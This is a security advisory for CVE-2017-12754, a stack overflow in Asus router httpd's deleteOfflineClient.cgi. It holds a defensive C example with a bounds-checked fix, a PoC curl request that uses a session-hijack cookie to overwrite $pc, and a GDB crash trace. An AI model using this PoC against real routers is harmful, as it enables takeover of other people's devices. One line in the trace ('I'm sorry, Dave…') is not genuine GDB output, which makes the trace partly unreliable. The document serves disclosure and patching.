Wireless-Router-Vulnerability/Asus_DeleteOfflineClientOverflow.txt
CVE-2017-12754
[Vulnerability]:
Stack buffer overflow in httpd
------------------------------------------
[Exploitation]:
Control of $pc.
Combined with a session hijack vulnerability or a CSRF attack, this allows
remote code execution and a connect-back shell.
------------------------------------------
[Vendor of Product]:
Asus wireless router
------------------------------------------
[Affected Products and firmware version]:
Asuswrt-Merlin, all firmware versions; the latest at the time of writing is 380.67_0
All firmware versions, including the latest at the time of writing, of the following models:
RT-AC5300
RT_AC1900P
RT-AC68U
RT-AC68P
RT-AC88U
RT-AC66U
RT-AC66U_B1
RT-AC58U
RT-AC56U
RT-AC55U
RT-AC52U
RT-AC51U
RT-N18U
RT-N66U
RT-N56U
RT-AC3200
RT-AC3100
RT_AC1200GU
RT_AC1200G
RT-AC1200
RT-AC53
RT-N12HP
RT-N12HP_B1
RT-N12D1
RT-N12+
RT_N12+_PRO
RT-N16
RT-N300
------------------------------------------
[Attack Type]:
Remote
------------------------------------------
[Can Cause Denial of Service?]:
Yes
------------------------------------------
[Reference]:
https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/httpd/web.c#L9277,L9289
http://asuswrt.lostrealm.ca/
https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/ (choose "Others" to download the firmware source code)
https://www.asus.com/Networking/Wireless-Routers-Products/
------------------------------------------
[Discoverer]:
Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/
------------------------------------------
[Affected components]:
Affected executable application: httpd
Affected source code file: \release\src\router\httpd\web.c
Affected function: deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query)
------------------------------------------
[Vulnerability details]:
When deleteOfflineClient.cgi of the web manager (httpd) is requested, httpd calls deleteOfflineClient() to parse the
URL of the HTTP GET request. It uses websGetVar() to fetch the value of the delete_offline_client parameter and then
copies that value into the stack buffer char mac_str[13] without limiting the parameter's length. The copy loop stores
every non-':' character and only afterwards checks whether exactly 12 characters were copied, so the check cannot
prevent the overflow. A long value therefore overruns mac_str, and this stack-based overflow can be used to gain
control over httpd's control flow by overwriting the saved $ra stored on the stack; the return taken when i != 12 is
what loads the corrupted $ra into $pc.
deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query)
{
    char *mac = NULL;
    char mac_str[13];                           /* fixed-size stack buffer */
    mac = websGetVar(wp, "delete_offline_client", "");   /* attacker-controlled, unbounded length */
    ......
    ......
    i = 0;
    while (*mac) {                              /* no bound on i: runs to the end of the input */
        if (*mac == ':') {
            mac++;
            continue;
        }
        else {
            mac_str[i] = tolower(*mac);         /* writes past mac_str[12] once i > 12 */
            i++;
            mac++;
        }
    }
    if (i != 12)                                /* length check happens only after the copy */
        return;
    ......
}
------------------------------------------
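The copy loop above, side by side with a bounds-checked replacement, as an added example that is not part of the advisory or of the Asuswrt source. unsafe_copy_len() mirrors the original loop but only counts the bytes it would store, so it can be run without actually overflowing a buffer; parse_mac_hardened() is an assumed fix that enforces the bound before each store and additionally rejects non-hex characters, which the original loop never checked. The PoC value is copied from the advisory and used here as constructed test input.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Size of the stack buffer in deleteOfflineClient(): char mac_str[13]. */
#define MAC_STR_SIZE 13

/* The delete_offline_client value from the advisory's PoC request (test input). */
static const char POC_VALUE[] = "aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3";

/*
 * Mirror of the original copy loop. Instead of writing into a 13-byte stack
 * buffer it only counts how many bytes the loop *would* store: every non-':'
 * character is stored, nothing stops the index at 12, and the original's
 * "if (i != 12) return;" runs only after the stores have happened.
 */
size_t unsafe_copy_len(const char *mac)
{
    size_t i = 0;
    while (*mac) {
        if (*mac == ':') {
            mac++;
            continue;
        }
        i++;                 /* original: mac_str[i] = tolower(*mac); i++; */
        mac++;
    }
    return i;
}

/* Bytes the original loop writes beyond the end of mac_str (0 if the value fits). */
size_t overflow_bytes(const char *mac)
{
    size_t n = unsafe_copy_len(mac);
    return n > MAC_STR_SIZE ? n - MAC_STR_SIZE : 0;
}

/*
 * Hardened replacement (assumed fix, not the vendor's patch). Same contract as
 * the original for valid input: 12 hex digits with optional ':' separators,
 * lower-cased into out[]. The bound is checked *before* each store, and
 * non-hex characters are rejected. Returns 0 on success, -1 on rejection;
 * out[] is always NUL-terminated on return.
 */
int parse_mac_hardened(const char *mac, char out[MAC_STR_SIZE])
{
    size_t i = 0;
    for (; *mac; mac++) {
        if (*mac == ':')
            continue;
        /* reject a non-hex byte, or a 13th digit that would overflow out[] */
        if (!isxdigit((unsigned char)*mac) || i >= MAC_STR_SIZE - 1) {
            out[0] = '\0';
            return -1;
        }
        out[i++] = (char)tolower((unsigned char)*mac);
    }
    out[i] = '\0';
    return i == MAC_STR_SIZE - 1 ? 0 : -1;   /* too short is also rejected */
}

int main(void)
{
    char out[MAC_STR_SIZE];
    printf("PoC value: original loop stores %zu bytes into a %d-byte buffer (%zu past the end)\n",
           unsafe_copy_len(POC_VALUE), MAC_STR_SIZE, overflow_bytes(POC_VALUE));
    printf("hardened parser on PoC value: %d\n", parse_mac_hardened(POC_VALUE, out));
    if (parse_mac_hardened("AA:BB:CC:DD:EE:FF", out) == 0)
        printf("hardened parser on a valid MAC: %s\n", out);
    return 0;
}
```

The point of the in-loop bound is timing: rejecting after the fact, as the original's if (i != 12) return; does, is too late once the stack has already been written, and on this target that late return is exactly the instruction that jumps to the overwritten $ra.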
[Exploitation details]:
Because access to deleteOfflineClient.cgi requires web authentication, a session hijack vulnerability or a CSRF attack
is needed first to reach the page. This vulnerability can then be used to control httpd's $pc by overwriting the
saved $ra stored on the stack.
For example, sending an HTTP GET request such as:
GET /deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3 HTTP/1.1
sets httpd's $pc to 0x00333333: the 'a' bytes (0x61) overrun mac_str and the saved s0-s2 (visible as 0x61616161 in
the GDB trace below), and the three '3' characters (0x33) land in the low bytes of the saved $ra.
------------------------------------------
[POC]:
# Tested product and firmware version: RT-N12HP_B1 (3.0.0.4.380.3479)
# With the help of CVE-2017-6549 (session hijack), this PoC exploits the vulnerability to control $pc
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' 'http://192.168.2.1/deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3'
------------------------------------------
[Gdb trace]:
admin@RT-N12HP_B1:/tmp/bin# ./gdb httpd $(pidof httpd)
dlopen failed on 'libthread_db.so.1' - File not found
GDB will not be able to debug pthreads.
GNU gdb 6.8
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "mipsel-linux"...
I'm sorry, Dave, I can't do that. Symbol format `elf32-tradlittlemips' unknown.
Attaching to program: /usr/sbin/httpd, process 651
0x2ad8d05c in ?? () from /lib/libc.so.0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00333333 in ?? ()
(gdb) i r
          zero       at       v0       v1       a0       a1       a2       a3
 R0   00000000 00000001 0000000c 00000000 004570ae 2adb90d0 0000001f 7fd973ff
            t0       t1       t2       t3       t4       t5       t6       t7
 R8   2adb90d0 7fd973e0 00000000 7fd970f0 2adb9f38 2adcc124 6172500a 3a616d67
            s0       s1       s2       s3       s4       s5       s6       s7
 R16  61616161 61616161 61616161 00000004 00446f4c 00000000 00446428 00498158
            t8       t9       k0       k1       gp       sp       s8       ra
 R24  00000000 2ad9f7d0 2adcfa70 00000000 0044e8d0 7fd97400 00440000 00333333
        status       lo       hi badvaddr    cause       pc
      01009c13 11288d57 00000001 00333332 00000008 00333333
          fcsr      fir  restart
      00800000 00000000 00000000
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
As the trace shows, both $ra and $pc have been overwritten with 0x00333333.
Chaining this control of $pc with a ROP chain can lead to remote command execution.